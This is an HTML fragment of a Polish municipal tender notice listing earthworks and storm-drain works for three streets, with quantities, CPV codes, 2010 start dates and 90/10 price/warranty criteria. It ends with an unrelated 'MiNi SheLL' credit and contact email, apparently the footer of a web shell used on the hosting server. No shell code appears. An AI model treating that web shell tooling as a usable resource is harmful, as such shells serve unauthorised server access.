<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.52-0, 45.11.12.00-0, 45.23.21.30-2, 45.23.31.61-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.05.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Gwarancja (ponad 36 miesięcy) - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Wykonanie robót ziemnych i podbudowy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. ul. Z. Nałkowskiej: 
        -  roboty ziemne wykonane koparkami z transportem urobku na odległość 5km  - 1279,90m3
     -  wykonanie i zagęszczenie warstwy odsączającej, grubość warstwy po zagęszczeniu 15cm -  
         2019,74 m2
     -  warstwy podbudowy z kruszywa naturalnego, grubość warstwy po zagęszczeniu 25cm -  
         2019,74 m2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.52-0, 45.11.12.00-0, 45.23.21.30-2, 45.23.31.61-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.04.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Gwarancja (ponad 36 miesięcy) - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Wykonanie kanalizacji deszczowej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. ul. Targowa :
- kanałów  z  rur  PCV  o  średnicy  zewnętrznej  O 315 mm   -   242 mb,
- studzienki kanalizacyjne systemowe  O 425 mm  - 6 studnie
- studzienek  ściekowych  ulicznych  betonowych  z  osadnikiem  O 500 mm   -   13 szt.
- kanał (przykanaliki) z rur PCV o średnicy zewnętrznej  O 200 mm   -   51,90 mb,
- osadnik  O 1500 mm - 1 sztuk,
2.ul. Bagienna : 
- kanałów  z  rur  PCV  o  średnicy  zewnętrznej  O 200 mm   -   179 mb,
- studzienki kanalizacyjne systemowe  O 425 mm  - 5 studnie
- studzienek  ściekowych  ulicznych  betonowych  z  osadnikiem  O 500 mm   -   12 szt.
- kanał (przykanaliki) z rur PCV o średnicy zewnętrznej  O 160 mm   -   48 mb,
3.ul. Z. Nałkowskiej : 
- kanałów z rur PCV o średnicy zewnętrznej O 250 mm   -   12 mb,
- studzienki kanalizacyjne systemowe  O 425 mm  - 1 studnie
- studzienek  ściekowych  ulicznych  betonowych  z  osadnikiem  O 500 mm   -   2 szt.
  - kanał (przykanaliki) z rur PCV o średnicy zewnętrznej  O 200 mm   -   6,50 mb,
  - studnie rewizyjne z kręgów betonowych O 1000 mm  - 1 studnie
  - przecisk o średnicy nominalnej do O 300 mm - 10 m,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.52-0, 45.11.12.00-0, 45.23.21.30-2, 45.23.31.61-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.04.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Gwarancja (ponad 36 miesięcy) - 10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com